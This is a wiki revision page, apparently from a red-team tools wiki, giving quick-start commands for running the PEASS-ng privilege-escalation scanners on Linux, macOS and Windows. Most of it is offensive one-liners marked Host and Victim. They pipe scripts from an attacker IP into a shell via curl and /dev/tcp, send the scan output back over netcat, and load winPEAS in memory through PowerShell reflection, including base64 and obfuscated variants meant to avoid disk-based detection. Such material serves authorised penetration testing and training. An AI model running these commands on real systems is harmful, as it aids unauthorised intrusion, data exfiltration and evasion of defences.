PEAS: Difference between revisions

From RCATs
(Created page with "Category:Tools Category:Reconnaissance ==Latest Releases== <syntaxhighlight lang=powershell> https://github.com/carlospolop/PEASS-ng/releases/tag/20230219 </syntaxhighlight> ==Quick Start LinPeas== <syntaxhighlight lang=powershell> # From github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Local network sudo python -m http.server 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl sudo nc -q 5 -lvnp 8...")
 
No edit summary
Line 7: Line 7:
</syntaxhighlight>
</syntaxhighlight>


==Quick Start MacPeas==
<syntaxhighlight lang=powershell>
Just execute linpeas.sh in a MacOS system and the MacPEAS version will be automatically executed
</syntaxhighlight>
==Quick Start LinPeas==
==Quick Start LinPeas==
<syntaxhighlight lang=powershell>
<syntaxhighlight lang=powershell>

Revision as of 09:47, 21 February 2023


Latest Releases

https://github.com/carlospolop/PEASS-ng/releases/tag/20230219

Quick Start MacPeas

Just execute linpeas.sh in a MacOS system and the MacPEAS version will be automatically executed

Quick Start LinPeas

# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Local network
sudo python -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

# Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

# Excute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim

# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors

# Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64

# Execute from memory in Penelope session
# From: https://github.com/brightio/penelope
> run peass-ng

Quick Start WinPeas

# Get latest release
$url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"

# One liner to download and execute winPEASany from memory in a PS shell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

# Before cmd in 3 lines
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use

# Load from disk in memory and execute:
$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS.exe")));
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use

# Load from disk in base64 and execute
##Generate winpeas in Base64:
[Convert]::ToBase64String([IO.File]::ReadAllBytes("D:\Users\user\winPEAS.exe")) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt
##Now upload the B64 string to the victim inside a file or copy it to the clipboard

 ##If you have uploaded the B64 as afile load it with:
$thecontent = Get-Content -Path D:\Users\victim\winPEAS.txt
 ##If you have copied the B64 to the clipboard do:
$thecontent = "aaaaaaaa..." #Where "aaa..." is the winpeas base64 string
##Finally, load binary in memory and execute
$wp = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent))
[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use

# Loading from file and executing a winpeas obfuscated version
##Load obfuscated version
$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS-Obfuscated.exe")));
$wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions sometimes this is different from "winPEAS.Program"
[<ReflectedType_from_before>]::Main("") #Used the ReflectedType name to execute winpeas